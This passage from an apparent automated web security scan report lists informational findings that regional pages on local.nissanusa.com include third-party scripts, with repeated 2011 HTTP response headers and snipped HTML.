<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.213. http://local.nissanusa.com/atlanta-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/atlanta-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=30303; expires=Sat, 05-Feb-2011 04:55:20 GMT; path=/
Set-Cookie: localDMA=atlanta-area; expires=Sat, 05-Feb-2011 04:55:20 GMT; path=/
Content-Length: 129057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.214. http://local.nissanusa.com/austin-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/austin-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=78701; expires=Sat, 05-Feb-2011 04:54:22 GMT; path=/
Set-Cookie: localDMA=austin-area; expires=Sat, 05-Feb-2011 04:54:22 GMT; path=/
Content-Length: 110636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.215. http://local.nissanusa.com/baltimore-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/baltimore-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:52:56 GMT
Set-Cookie: localZIP=21201; expires=Sat, 05-Feb-2011 04:52:57 GMT; path=/
Set-Cookie: localDMA=baltimore-area; expires=Sat, 05-Feb-2011 04:52:57 GMT; path=/
Content-Length: 171708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.216. http://local.nissanusa.com/boston-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/boston-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=02201; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Set-Cookie: localDMA=boston-area; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Content-Length: 155520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.217. http://local.nissanusa.com/chicago-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/chicago-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:51:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=60601; expires=Sat, 05-Feb-2011 04:51:58 GMT; path=/
Set-Cookie: localDMA=chicago-area; expires=Sat, 05-Feb-2011 04:51:58 GMT; path=/
Content-Length: 139873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.218. http://local.nissanusa.com/cincinnati-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/cincinnati-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=45201; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Set-Cookie: localDMA=cincinnati-area; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Content-Length: 125013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.219. http://local.nissanusa.com/cleveland-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/cleveland-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=44101; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Set-Cookie: localDMA=cleveland-area; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Content-Length: 116578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.220. http://local.nissanusa.com/columbus-oh-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/columbus-oh-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=43215; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Set-Cookie: localDMA=columbus-oh-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Content-Length: 116057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.221. http://local.nissanusa.com/dallas-ft-worth-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/dallas-ft-worth-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=75201; expires=Sat, 05-Feb-2011 04:53:19 GMT; path=/
Set-Cookie: localDMA=dallas-ft-worth-area; expires=Sat, 05-Feb-2011 04:53:19 GMT; path=/
Content-Length: 118245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.222. http://local.nissanusa.com/denver-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/denver-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=80201; expires=Sat, 05-Feb-2011 04:54:11 GMT; path=/
Set-Cookie: localDMA=denver-area; expires=Sat, 05-Feb-2011 04:54:11 GMT; path=/
Content-Length: 115525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.223. http://local.nissanusa.com/harlingen-brownsville-tx-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/harlingen-brownsville-tx-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=78550; expires=Sat, 05-Feb-2011 04:54:14 GMT; path=/
Set-Cookie: localDMA=harlingen-brownsville-tx-area; expires=Sat, 05-Feb-2011 04:54:14 GMT; path=/
Content-Length: 104990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.224. http://local.nissanusa.com/harrisburg-lancaster-pa-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/harrisburg-lancaster-pa-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=17101; expires=Sat, 05-Feb-2011 04:52:55 GMT; path=/
Set-Cookie: localDMA=harrisburg-lancaster-pa-area; expires=Sat, 05-Feb-2011 04:52:55 GMT; path=/
Content-Length: 166681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.225. http://local.nissanusa.com/hartford-new-haven-ct-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/hartford-new-haven-ct-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=06101; expires=Sat, 05-Feb-2011 04:53:01 GMT; path=/
Set-Cookie: localDMA=hartford-new-haven-ct-area; expires=Sat, 05-Feb-2011 04:53:01 GMT; path=/
Content-Length: 203647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.226. http://local.nissanusa.com/honolulu-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/honolulu-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=96801; expires=Sat, 05-Feb-2011 04:57:29 GMT; path=/
Set-Cookie: localDMA=honolulu-area; expires=Sat, 05-Feb-2011 04:57:29 GMT; path=/
Content-Length: 107900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.227. http://local.nissanusa.com/houston-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/houston-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=77001; expires=Sat, 05-Feb-2011 04:53:28 GMT; path=/
Set-Cookie: localDMA=houston-area; expires=Sat, 05-Feb-2011 04:53:28 GMT; path=/
Content-Length: 114259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.228. http://local.nissanusa.com/indianapolis-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/indianapolis-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:52:08 GMT
Set-Cookie: localZIP=46201; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Set-Cookie: localDMA=indianapolis-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Content-Length: 111740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.229. http://local.nissanusa.com/jacksonville-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/jacksonville-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=32201; expires=Sat, 05-Feb-2011 04:56:16 GMT; path=/
Set-Cookie: localDMA=jacksonville-area; expires=Sat, 05-Feb-2011 04:56:16 GMT; path=/
Content-Length: 116343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.230. http://local.nissanusa.com/las-vegas-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/las-vegas-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=89101; expires=Sat, 05-Feb-2011 04:56:53 GMT; path=/
Set-Cookie: localDMA=las-vegas-area; expires=Sat, 05-Feb-2011 04:56:53 GMT; path=/
Content-Length: 107986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

